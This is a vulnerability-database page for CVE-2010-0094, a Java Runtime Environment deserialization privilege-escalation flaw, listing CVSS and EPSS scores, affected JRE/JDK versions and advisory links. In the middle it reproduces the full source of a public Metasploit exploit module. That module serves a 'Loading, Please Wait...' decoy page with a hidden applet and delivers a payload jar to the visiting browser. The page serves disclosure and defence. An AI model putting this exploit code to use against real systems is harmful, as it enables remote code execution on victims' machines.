CVE-2010-0094 : Detail

CVE-2010-0094

91.61%V3
Network
2010-04-01
14h00 +00:00
2018-10-10
16h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18 and 5.0 Update 23 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the March 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is due to missing privilege checks during deserialization of RMIConnectionImpl objects, which allows remote attackers to call system-level Java functions via the ClassLoader of a constructor that is being deserialized.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 16305

Publication date : 2010-09-26 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: java_rmi_connection_impl.rb 10490 2010-09-27 00:09:17Z egypt $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML # # Superceded by java_trusted_chain # #include Msf::Exploit::Remote::BrowserAutopwn #autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java RMIConnectionImpl Deserialization Privilege Escalation Exploit', 'Description' => %q{ This module exploits a vulnerability in the Java Runtime Environment that allows to deserialize a MarshalledObject containing a custom classloader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23. }, 'License' => MSF_LICENSE, 'Author' => [ 'Sami Koivu', # Discovery 'Matthias Kaiser', # PoC 'egypt' # metasploit module ], 'Version' => '$Revision: 10490 $', 'References' => [ [ 'CVE', '2010-0094' ], [ 'OSVDB', '63484' ], [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html' ], ], 'Platform' => [ 'java' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Arch' => ARCH_JAVA, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 31 2010' )) end def on_request_uri( cli, request ) if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect(cli, get_resource() + '/', '') return end print_status("Handling request from #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) return end paths = [ [ "Exploit.class" ], [ "Exploit$1.class" ], [ "Exploit$1$1.class" ], [ "Exploit$2.class" ], [ "Payloader.class" ], [ "PayloadClassLoader.class" ], [ "payload.ser" ], ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2010-0094", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end print_status("#{self.name} Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" }) handler(cli) end def generate_html html = "<html><head><title>Loading, Please Wait...</title></head>" html += "<body><center><p>Loading, Please Wait...</p></center>" html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" html += "</applet></body></html>" return html end end

Products Mentioned

Configuraton 0

Sun>>Jre >> Version To (including) 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Sun>>Jre >> Version 1.6.0

Configuraton 0

Sun>>Jdk >> Version To (including) 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jdk >> Version 1.6.0

Configuraton 0

Sun>>Jdk >> Version To (including) 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jdk >> Version 1.5.0

Configuraton 0

Sun>>Jre >> Version To (including) 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

Sun>>Jre >> Version 1.5.0

References

http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/39317
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0383.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/40545
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1454
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/39819
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1107
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2010-0338.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2010/1793
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/43308
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=127557596201693&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.redhat.com/support/errata/RHSA-2010-0339.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=127557596201693&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/39292
Tags : third-party-advisory, x_refsource_SECUNIA
http://support.apple.com/kb/HT4170
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/39659
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0471.html
Tags : vendor-advisory, x_refsource_REDHAT
http://ubuntu.com/usn/usn-923-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.redhat.com/support/errata/RHSA-2010-0337.html
Tags : vendor-advisory, x_refsource_REDHAT
http://support.apple.com/kb/HT4171
Tags : x_refsource_CONFIRM
http://www.mandriva.com/security/advisories?name=MDVSA-2010:084
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.vupen.com/english/advisories/2010/1191
Tags : vdb-entry, x_refsource_VUPEN